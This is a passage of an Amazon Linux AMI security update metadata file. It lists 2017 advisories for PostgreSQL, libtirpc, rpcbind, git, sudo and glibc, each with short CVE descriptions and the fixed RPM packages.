version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.21-1.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-839</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-839: medium priority package update for postgresql93 postgresql94 postgresql95</title><issued date="2017-06-06 16:53:00" /><updated date="2017-06-06 22:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7486:
It was found that the pg_user_mappings view from postgresql could disclose information about user mappings to a foreign database to unprivileged users. An authenticated attacker with USAGE privilege for this mapping could, when querying the view, obtain user mapping data, such as the username and password used to connect to the foreign database.
1448089:
CVE-2017-7486 postgresql: pg_user_mappings view discloses foreign server passwords
CVE-2017-7485:
It was found that the PGREQUIRESSL was no longer enforcing a SSL/TLS connection to a PostgreSQL server. An active Man-in-the-Middle attacker could use this flaw to strip the SSL/TLS protection from a connection between a client and a server.
1448086:
CVE-2017-7485 postgresql: libpq ignores PGREQUIRESSL environment variable
CVE-2017-7484:
It was found that some selectivity estimation functions did not check user privileges before providing information from pg_statistic, possibly leaking information. An unprivileged attacker could use this flaw to steal some information from tables they are otherwise not allowed to access.
1448078:
CVE-2017-7484 postgresql: Selectivity estimators bypass SELECT privilege checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7484" title="" id="CVE-2017-7484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7485" title="" id="CVE-2017-7485" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7486" title="" id="CVE-2017-7486" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-libs" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plperl" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-libs" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython27-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.17" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.17-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-test-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.12" release="1.68.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.12-1.68.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.12" release="1.68.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.12-1.68.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.7" release="1.72.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.7-1.72.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-test" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.7-1.72.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.7" release="1.72.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.7-1.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-840</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-840: important priority package update for libtirpc</title><issued date="2017-06-06 17:00:00" /><updated date="2017-06-06 22:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8779:
It was found that due to the way rpcbind uses libtirpc (libntirpc), a memory leak can occur when parsing specially crafted XDR messages. An attacker sending thousands of messages to rpcbind could cause its memory usage to grow without bound, eventually causing it to be terminated by the OOM killer.
1448124:
CVE-2017-8779 rpcbind, libtirpc, libntirpc: Memory leak when failing to parse XDR strings or bytearrays
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779" title="" id="CVE-2017-8779" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtirpc-debuginfo" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-debuginfo-0.2.4-0.8.14.amzn1.x86_64.rpm</filename></package><package name="libtirpc-devel" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-devel-0.2.4-0.8.14.amzn1.x86_64.rpm</filename></package><package name="libtirpc" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtirpc-0.2.4-0.8.14.amzn1.x86_64.rpm</filename></package><package name="libtirpc" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-0.2.4-0.8.14.amzn1.i686.rpm</filename></package><package name="libtirpc-devel" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-devel-0.2.4-0.8.14.amzn1.i686.rpm</filename></package><package name="libtirpc-debuginfo" version="0.2.4" release="0.8.14.amzn1" epoch="0" arch="i686"><filename>Packages/libtirpc-debuginfo-0.2.4-0.8.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-841</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-841: important priority package update for rpcbind</title><issued date="2017-06-06 17:03:00" /><updated date="2017-06-06 22:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8779:
It was found that due to the way rpcbind uses libtirpc (libntirpc), a memory leak can occur when parsing specially crafted XDR messages. An attacker sending thousands of messages to rpcbind could cause its memory usage to grow without bound, eventually causing it to be terminated by the OOM killer.
1448124:
CVE-2017-8779 rpcbind, libtirpc, libntirpc: Memory leak when failing to parse XDR strings or bytearrays
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779" title="" id="CVE-2017-8779" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1267.html" title="" id="RHSA-2017:1267" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rpcbind-debuginfo" version="0.2.0" release="13.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpcbind-debuginfo-0.2.0-13.9.amzn1.x86_64.rpm</filename></package><package name="rpcbind" version="0.2.0" release="13.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpcbind-0.2.0-13.9.amzn1.x86_64.rpm</filename></package><package name="rpcbind-debuginfo" version="0.2.0" release="13.9.amzn1" epoch="0" arch="i686"><filename>Packages/rpcbind-debuginfo-0.2.0-13.9.amzn1.i686.rpm</filename></package><package name="rpcbind" version="0.2.0" release="13.9.amzn1" epoch="0" arch="i686"><filename>Packages/rpcbind-0.2.0-13.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-842</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-842: medium priority package update for git</title><issued date="2017-06-06 17:07:00" /><updated date="2017-06-06 22:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8386:
A flaw was found in the way git-shell handled command-line options for the restricted set of git-shell commands. A remote authenticated attacker could use this flaw to bypass git-shell restrictions, to view and manipulate files, by abusing the instance of the less command launched using crafted command-line options.
1450407:
CVE-2017-8386 git: Escape out of git-shell
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8386" title="" id="CVE-2017-8386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Git-SVN" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.7.5" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.7.5-1.49.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.7.5" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.7.5-1.49.amzn1.x86_64.rpm</filename></package><package name="git-email" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git" version="2.7.5" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.7.5-1.49.amzn1.x86_64.rpm</filename></package><package name="git-daemon" version="2.7.5" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.7.5-1.49.amzn1.x86_64.rpm</filename></package><package name="git-bzr" version="2.7.5" release="1.49.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.7.5-1.49.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.7.5" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.7.5-1.49.amzn1.i686.rpm</filename></package><package name="git" version="2.7.5" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.7.5-1.49.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.7.5" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.7.5-1.49.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.7.5" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.7.5-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-843</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-843: important priority package update for sudo</title><issued date="2017-06-06 17:08:00" /><updated date="2017-06-06 22:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000367:
A flaw was found in the way sudo parsed tty information from the process status file in the proc filesystem. A local user with privileges to execute commands via sudo could use this flaw to escalate their privileges to root.
1453074:
CVE-2017-1000367 sudo: Privilege escalation in via improper get_process_ttyname() parsing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000367" title="" id="CVE-2017-1000367" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1382.html" title="" id="RHSA-2017:1382" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.6p3-28.25.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.6p3-28.25.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.6p3-28.25.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.6p3-28.25.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.6p3-28.25.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.8.6p3" release="28.25.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.6p3-28.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-844</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-844: critical priority package update for glibc</title><issued date="2017-06-19 08:51:00" /><updated date="2017-06-19 08:51:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-1000366:
Glibc contains a vulnerability that allows specially crafted LD_LIBRARY_PATH values to manipulate the heap/stack, causing them to alias, potentially resulting in arbitrary code execution. Please note that additional hardening changes have been made to glibc to prevent manipulation of stack and heap memory but these issues are not directly exploitable, as such they have not been given a CVE. This affects glibc 2.25 and earlier.
CVE-2017-1000366
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000366" title="" id="CVE-2017-1000366" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc-utils" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="157.170.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-157.170.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="157.170.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-157.170.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="157.170.amzn1" 